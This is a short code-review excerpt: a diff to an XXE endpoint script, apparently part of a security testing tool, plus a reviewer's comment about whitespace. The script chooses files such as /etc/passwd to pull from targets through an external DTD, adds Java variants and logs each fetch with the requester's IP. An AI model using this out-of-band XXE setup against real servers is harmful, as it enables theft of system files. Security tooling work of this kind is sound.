endpoint/xxe_dtd.php

```diff
@@ -14,26 +14,48 @@
 
 include("functions.php");
 
-$num = -1;
+$payload_num = -1;
 // We must use small files because big one won't be sent
 switch($payload) {
 	case "windows":
 		$filename = "c:/windows/system32/drivers/etc/networks";
-		$num = 2;
+		$payload_num = 2;
 		break;
 	case "linux":
 		$filename = "/etc/passwd";
-		$num = 1;
+		$payload_num = 1;
 		break;
 	case "linux2":
 		$filename = "/etc/networks";
-		$num = 0;
+		$payload_num = 0;
+		break;
+	case "javalin":
+		$filename = "/etc/passwd";
+		$payload_num = 3;
+		break;
+	case "javawin":
+		$filename = "c:/windows/system32/drivers/etc/networks";
+		$payload_num = 4;
 		break;
 }
 
+$time = time();
+$directory = "./xxe_data/$session_id/$path_id/$hex_param/";
+if (!is_dir($directory)) mkdir($directory, 0777, true);
+
+// Create an empty file so we can know if the DTD was queried
+touch("$directory/$time-$payload_num-$ip.txt");
+
+if (substr($payload, 0, 4 ) === "java") {
```

Comment:
there is an extra space after the 4, should be: `if (substr($payload, 0, 4) === "java") {`